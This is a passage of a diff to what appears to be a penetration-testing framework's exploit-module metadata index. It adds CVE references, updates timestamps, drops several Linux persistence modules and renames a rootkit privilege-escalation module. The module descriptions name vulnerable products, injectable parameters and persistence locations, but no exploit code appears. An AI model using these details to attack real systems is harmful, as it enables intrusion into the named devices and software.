    "description": "op5 an open source network monitoring software.\n          The configuration page in version 7.1.9 and below\n          allows the ability to test a system command, which\n          can be abused to run arbitrary code as an unpriv user.",
    "references": [
+      "CVE-2025-34115",
      "EDB-39676",
      "URL-https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/"
    ],
@@ -80307,7 +80860,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/op5_config_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/op5_config_exec",
@@ -80340,6 +80893,7 @@
    ],
    "description": "This module exploits a vulnerability in Openfiler v2.x\n          which could be abused to allow authenticated users to execute arbitrary\n          code under the context of the 'openfiler' user. The 'system.html' file\n          uses user controlled data from the 'device' parameter to create a new\n          'NetworkCard' object. The class constructor in 'network.inc' calls exec()\n          with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without\n          providing a system password.",
    "references": [
+      "CVE-2012-10040",
      "BID-55490",
      "URL-http://web.archive.org/web/20210922060411/https://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/",
      "OSVDB-93881",
@@ -80366,7 +80920,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/openfiler_networkcard_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/openfiler_networkcard_exec",
@@ -81074,7 +81628,9 @@
      "xistence <xistence@0x90.nl>"
    ],
    "description": "This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.\n          It will leverage an unauthenticated command injection in the Anyterm service on\n          port 8023/TCP. Commands are executed as the user \"pandora\". In Pandora FMS 4.1 and 5.0RC1\n          the user \"artica\" is not assigned a password by default, which makes it possible to su\n          to this user from the \"pandora\" user. The \"artica\" user has access to sudo without a\n          password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0\n          and lower force a password for the \"artica\" user during installation.",
-    "references": [],
+    "references": [
+      "CVE-2014-125124"
+    ],
    "platform": "Unix",
    "arch": "cmd",
    "rport": 8023,
@@ -81096,7 +81652,7 @@
    "targets": [
      "Pandora 5.0RC1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/pandora_fms_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pandora_fms_exec",
@@ -81130,6 +81686,7 @@
    ],
    "description": "This module attempts to exploit multiple issues in order to gain remote\n          code execution under Pandora FMS version <= 5.0 SP2.  First, an attempt\n          to authenticate using default credentials is performed.  If this method\n          fails, a SQL injection vulnerability is leveraged in order to extract\n          the \"Auto Login\" password hash.  If this value is not set, the module\n          will then extract the administrator account's MD5 password hash.",
    "references": [
+      "CVE-2014-125115",
      "URL-http://pandorafms.com/downloads/whats_new_5-SP3.pdf",
      "URL-http://blog.pandorafms.org/?p=2041"
    ],
@@ -81154,7 +81711,7 @@
    "targets": [
      "Pandora FMS version <= 5.0 SP2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/pandora_fms_sqli.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pandora_fms_sqli",
@@ -81246,7 +81803,9 @@
      "Onur ER <onur@onurer.net>"
    ],
    "description": "This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.\n          net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.",
-    "references": [],
+    "references": [
+      "CVE-2025-34088"
+    ],
    "platform": "Linux",
    "arch": "x86, x64",
    "rport": 80,
@@ -81268,7 +81827,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/pandora_ping_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pandora_ping_cmd_exec",
@@ -82696,6 +83255,7 @@
    ],
    "description": "Different Raidsonic NAS devices are vulnerable to OS command injection via the web\n          interface. The vulnerability exists in timeHandler.cgi, which is accessible without\n          authentication. This module has been tested with the versions IB-NAS5220 and\n          IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon\n          configuration, this module is set to ManualRanking and could cause target instability.",
    "references": [
+      "CVE-2013-10049",
      "OSVDB-90221",
      "EDB-24499",
      "BID-57958",
@@ -82722,7 +83282,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/raidsonic_nas_ib5220_exec_noauth",
@@ -83121,6 +83681,7 @@
    ],
    "description": "This module allows an attacker with a privileged rConfig account to start a reverse shell\n          due to an arbitrary file upload vulnerability in `/lib/crud/vendors.crud.php`.\n          Then, the uploaded payload can be triggered by a call to `images/vendor/<payload_file>.php`",
    "references": [
+      "CVE-2022-44384",
      "EDB-49665",
      "EDB-49783"
    ],
@@ -83145,7 +83706,7 @@
    "targets": [
      "rConfig <= 3.9.6"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/rconfig_vendors_auth_file_upload_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/rconfig_vendors_auth_file_upload_rce",
@@ -83240,6 +83801,7 @@
    ],
    "description": "This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress\n          virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form\n          can be exploited to add a malicious user into the application's database. An attacker can then exploit a\n          command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure\n          configuration of the sudoers file can be abused to escalate privileges to root.",
    "references": [
+      "CVE-2025-34112",
      "URL-http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf"
    ],
    "platform": "Linux",
@@ -83263,7 +83825,7 @@
    "targets": [
      "Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/riverbed_netprofiler_netexpress_exec",
@@ -85123,7 +85685,8 @@
      "CVE-2022-24989",
      "URL-https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/",
      "URL-https://github.com/0xf4n9x/CVE-2022-24990",
-      "URL-https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990"
+      "URL-https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd, x64, x86, aarch64",
@@ -85147,7 +85710,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2023-06-12 19:28:08 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb",
    "is_install_path": true,
    "ref_name": "linux/http/terramaster_unauth_rce_cve_2022_24990",
@@ -85182,6 +85745,7 @@
    ],
    "description": "Tiki-Wiki CMS's calendar module contains a remote code execution\n          vulnerability within the viewmode GET parameter.\n          The calendar module is NOT enabled by default.  If enabled,\n          the default permissions are set to NOT allow anonymous users\n          to access.\n\n          Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14\n          Verified/Tested against 14.1",
    "references": [
+      "CVE-2025-34113",
      "EDB-39965",
      "URL-https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki"
    ],
@@ -85206,7 +85770,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/tiki_calendar_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/tiki_calendar_exec",
@@ -85603,6 +86167,9 @@
    ],
    "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n          terminal command under the context of the web server user.\n\n          The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product\n          have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which\n          leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process\n          does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n          unauthenticated users can execute a terminal command under the context of the web server user.",
    "references": [
+      "CVE-2017-7896",
+      "CVE-2017-11392",
+      "CVE-2017-11391",
      "URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/",
      "URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/"
    ],
@@ -85627,7 +86194,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-07 14:03:32 +0000",
    "path": "/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/trendmicro_imsva_widget_exec",
@@ -85959,6 +86526,7 @@
    ],
    "description": "This module exploits a pre-auth file upload to install a new root user\n          to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.\n\n          FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.\n          /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.\n\n          This method is used by the \"mf\" malware infecting these devices.",
    "references": [
+      "CVE-2015-9266",
      "EDB-39701",
      "URL-https://hackerone.com/reports/73480"
    ],
@@ -85983,7 +86551,7 @@
    "targets": [
      "Ubiquiti airOS < 5.6.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb",
    "is_install_path": true,
    "ref_name": "linux/http/ubiquiti_airos_file_upload",
@@ -86962,6 +87530,7 @@
    ],
    "description": "This module exploits a command execution vulnerability in WAN Emulator\n          version 2.3 which can be abused to allow unauthenticated users to execute\n          arbitrary commands under the context of the 'www-data' user.\n          The 'result.php' script calls shell_exec() with user controlled data\n          from the 'pc' parameter. This module also exploits a command execution\n          vulnerability to gain root privileges. The 'dosu' binary is suid 'root'\n          and vulnerable to command execution in argument one.",
    "references": [
+      "CVE-2012-10041",
      "OSVDB-85344",
      "OSVDB-85345"
    ],
@@ -86986,7 +87555,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/wanem_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/wanem_exec",
@@ -87325,6 +87894,7 @@
    ],
    "description": "This module exploits a vulnerability found in WeBid version 1.0.2.\n          By abusing the converter.php file, a malicious user can inject PHP code\n          in the includes/currencies.php script without any authentication, which\n          results in arbitrary code execution.",
    "references": [
+      "CVE-2011-10011",
      "OSVDB-73609",
      "EDB-17487",
      "URL-http://web.archive.org/web/20230206230259/http://www.webidsupport.com/forums/showthread.php?3892"
@@ -87350,7 +87920,7 @@
    "targets": [
      "WeBid 1.0.2 / Ubuntu"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/webid_converter.rb",
    "is_install_path": true,
    "ref_name": "linux/http/webid_converter",
@@ -87685,6 +88255,7 @@
    ],
    "description": "This module exploits a command injection vulnerability in an undocumented\n          CGI file in several versions of the WePresent WiPG-1000 devices.\n          Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.",
    "references": [
+      "CVE-2025-34103",
      "URL-https://www.redguard.ch/advisories/wepresent-wipg1000.txt"
    ],
    "platform": "Unix",
@@ -87708,7 +88279,7 @@
    "targets": [
      "WiPG-1000 <=2.0.0.7"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/wipg1000_cmd_injection.rb",
    "is_install_path": true,
    "ref_name": "linux/http/wipg1000_cmd_injection",
@@ -87915,6 +88486,7 @@
    ],
    "description": "This module exploits a vulnerability in ZEN Load Balancer\n          version 2.0 and 3.0-rc1 which could be abused to allow authenticated users\n          to execute arbitrary code under the context of the 'root' user.\n          The 'content2-2.cgi' file uses user controlled data from the 'filelog'\n          parameter within backticks.",
    "references": [
+      "CVE-2012-10039",
      "OSVDB-85654",
      "URL-http://web.archive.org/web/20221203195056/https://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/"
    ],
@@ -87939,7 +88511,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/zen_load_balancer_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zen_load_balancer_exec",
@@ -87972,6 +88544,7 @@
    ],
    "description": "This module exploits a command execution vulnerability in Zenoss 3.x\n          which could be abused to allow authenticated users to execute arbitrary\n          code under the context of the 'zenoss' user. The show_daemon_xml_configs()\n          function in the 'ZenossInfo.py' script calls Popen() with user\n          controlled data from the 'daemon' parameter.",
    "references": [
+      "CVE-2012-10048",
      "URL-http://web.archive.org/web/20221203180334/https://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/",
      "OSVDB-84408"
    ],
@@ -87996,7 +88569,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
@@ -88939,51 +89512,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/apt_package_manager_persistence": {
-    "name": "APT Package Manager Persistence",
-    "fullname": "exploit/linux/local/apt_package_manager_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1999-03-09",
-    "type": "exploit",
-    "author": [
-      "Aaron Ringo"
-    ],
-    "description": "This module will run a payload when the package manager is used. No\n          handler is ran automatically so you must configure an appropriate\n          exploit/multi/handler to connect. This module creates a pre-invoke hook\n          for APT in apt.conf.d. The hook name syntax is numeric followed by text.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/apt_package_manager_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/asan_suid_executable_priv_esc": {
    "name": "AddressSanitizer (ASan) SUID Executable Privilege Escalation",
    "fullname": "exploit/linux/local/asan_suid_executable_priv_esc",
@@ -89039,51 +89567,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/autostart_persistence": {
-    "name": "Autostart Desktop Item Persistence",
-    "fullname": "exploit/linux/local/autostart_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2006-02-13",
-    "type": "exploit",
-    "author": [
-      "Eliott Teissonniere"
-    ],
-    "description": "This module will create an autostart entry to execute a payload.\n          The payload will be executed when the users logs in.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/autostart_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/autostart_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
    "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
    "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -89283,6 +89766,7 @@
    ],
    "description": "This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The\n          runrshell binary is meant to execute a shell script as root, but can be abused to inject\n          extra commands in the argument, allowing you to execute anything as root.",
    "references": [
+      "CVE-2018-15439",
      "URL-https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56"
    ],
    "platform": "Linux",
@@ -89293,7 +89777,7 @@
    "targets": [
      "Cisco Prime Infrastructure 3.4.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cpi_runrshell_priv_esc",
@@ -89318,50 +89802,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/cron_persistence": {
-    "name": "Cron Persistence",
-    "fullname": "exploit/linux/local/cron_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1979-07-01",
-    "type": "exploit",
-    "author": [
-      "h00die <mike@shorebreaksecurity.com>"
-    ],
-    "description": "This module will create a cron or crontab entry to execute a payload.\n          The module includes the ability to automatically clean up those entries to prevent multiple executions.\n          syslog will get a copy of the cron entry.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Cron",
-      "User Crontab",
-      "System Crontab"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/cron_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/cron_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe": {
    "name": "Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE",
    "fullname": "exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -89837,54 +90277,6 @@
    "needs_cleanup": null,
    "actions": []
  },
-  "exploit_linux/local/diamorphine_rootkit_signal_priv_esc": {
-    "name": "Diamorphine Rootkit Signal Privilege Escalation",
-    "fullname": "exploit/linux/local/diamorphine_rootkit_signal_priv_esc",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2013-11-07",
-    "type": "exploit",
-    "author": [
-      "m0nad",
-      "bcoles <bcoles@gmail.com>"
-    ],
-    "description": "This module uses Diamorphine rootkit's privesc feature using signal\n          64 to elevate the privileges of arbitrary processes to UID 0 (root).\n\n          This module has been tested successfully with Diamorphine from `master`\n          branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).",
-    "references": [
-      "URL-https://github.com/m0nad/Diamorphine"
-    ],
-    "platform": "Linux",
-    "arch": "x86, x64",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Auto"
-    ],
-    "mod_time": "2025-06-25 09:25:53 +0000",
-    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/docker_cgroup_escape": {
    "name": "Docker cgroups Container Escape",
    "fullname": "exploit/linux/local/docker_cgroup_escape",
@@ -90698,6 +91090,7 @@
    ],
    "description": "Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as\n            lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,\n            Apache by default on CentOS 5.8, the operating system supported by Kloxo.\n            This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.",
    "references": [
+      "CVE-2012-10022",
      "EDB-25406",
      "OSVDB-93287",
      "URL-http://roothackers.net/showthread.php?tid=92"
@@ -90710,7 +91103,7 @@
    "targets": [
      "Kloxo 6.1.12"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/local/kloxo_lxsuexec.rb",
    "is_install_path": true,
    "ref_name": "linux/local/kloxo_lxsuexec",
@@ -90798,6 +91191,7 @@
    ],
    "description": "This module attempts to gain root privileges on Deepin Linux systems\n          by using lastore-daemon to install a package.\n\n          The lastore-daemon D-Bus configuration on Deepin Linux permits any\n          user in the sudo group to install arbitrary system packages without\n          providing a password, resulting in code execution as root. By default,\n          the first user created on the system is a member of the sudo group.\n\n          This module has been tested successfully with lastore-daemon versions\n          0.9.53-1 on Deepin Linux 15.5 (x64); and\n          0.9.66-1 on Deepin Linux 15.7 (x64).",
    "references": [
+      "CVE-2016-15045",
      "EDB-39433",
      "URL-https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8"
    ],
@@ -90809,7 +91203,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
@@ -90891,51 +91285,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/motd_persistence": {
-    "name": "update-motd.d Persistence",
-    "fullname": "exploit/linux/local/motd_persistence",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": "1999-01-01",
-    "type": "exploit",
-    "author": [
-      "Julien Voisin"
-    ],
-    "description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n          The payload will be executed with root privileges everytime a user logs in.",
-    "references": [
-      "URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2024-09-11 13:30:09 +0000",
-    "path": "/modules/exploits/linux/local/motd_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/motd_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [],
-      "Reliability": [
-        "event-dependent"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_linux/local/ndsudo_cve_2024_32019": {
    "name": "Netdata ndsudo privilege escalation",
    "fullname": "exploit/linux/local/ndsudo_cve_2024_32019",
@@ -91586,6 +91935,7 @@
    ],
    "description": "This module abuses a feature of the sudo command on Progress Flowmon.\n          Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  This\n          includes executing a PHP command with a specific file name. If the\n          file is overwritten with PHP code it can be used to elevate privileges\n          to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.",
    "references": [
+      "CVE-2024-2389",
      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
    ],
@@ -91597,7 +91947,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2024-05-29 08:39:06 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb",
    "is_install_path": true,
    "ref_name": "linux/local/progress_flowmon_sudo_privesc_2024",
@@ -91636,6 +91986,7 @@
    ],
    "description": "This module abuses a feature of the sudo command on Progress Kemp\n          LoadMaster.  Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  Some files\n          have this permission are not write-protected from the default 'bal' user.\n          As such, if the file is overwritten with an arbitrary file, it will still\n          auto-elevate.  This module overwrites the /bin/loadkeys file with another\n          executable.",
    "references": [
+      "CVE-2024-1212",
      "URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
      "URL-https://kemptechnologies.com/kemp-load-balancers"
    ],
@@ -91648,7 +91999,7 @@
      "Dropper",
      "Command"
    ],
-    "mod_time": "2025-02-20 08:19:23 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb",
    "is_install_path": true,
    "ref_name": "linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
@@ -91782,51 +92133,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/rc_local_persistence": {
-    "name": "rc.local Persistence",
-    "fullname": "exploit/linux/local/rc_local_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1980-10-01",
-    "type": "exploit",
-    "author": [
-      "Eliott Teissonniere"
-    ],
-    "description": "This module will edit /etc/rc.local in order to persist a payload.\n          The payload will be executed on the next reboot.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/rc_local_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/rc_local_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
    "name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
    "fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -92048,6 +92354,62 @@
    "needs_cleanup": true,
    "actions": []
  },
+  "exploit_linux/local/rootkit_privesc_signal_hunter": {
+    "name": "Rootkit Privilege Escalation Signal Hunter",
+    "fullname": "exploit/linux/local/rootkit_privesc_signal_hunter",
+    "aliases": [
+      "exploit/linux/local/diamorphine_rootkit_signal_priv_esc"
+    ],
+    "rank": 500,
+    "disclosure_date": "2013-11-07",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module searches for rootkits which use signals to elevate\n          process privileges to UID 0 (root).\n\n          Some rootkits install signal handlers which listen for specific\n          signals to elevate process privileges. This module identifies these\n          rootkits by sending signals and observing UID switching to root.\n\n          This module has been tested successfully with:\n\n          Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04\n          kernel 6.14.0-33-generic (x64);\n          Diamorphine 2337293 (2023-09-20) on Ubuntu 22.04\n          kernel 5.19.0-38-generic (x64);\n          Codeine 9644336 (2025-09-02) on Ubuntu 22.04\n          kernel 5.19.0-38-generic (x64).",
+    "references": [
+      "URL-https://github.com/bcoles/rootkit-signal-hunter",
+      "URL-https://xcellerator.github.io/posts/linux_rootkits_03/",
+      "URL-https://github.com/m0nad/Diamorphine",
+      "URL-https://github.com/h3xduck/Umbra",
+      "URL-https://github.com/diego-tella/Codeine",
+      "URL-https://github.com/MatheuZSecurity/Singularity",
+      "URL-https://github.com/Asekon/RootKit"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, armle, aarch64, riscv64le, riscv32le, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-10-31 17:22:19 +0000",
+    "path": "/modules/exploits/linux/local/rootkit_privesc_signal_hunter.rb",
+    "is_install_path": true,
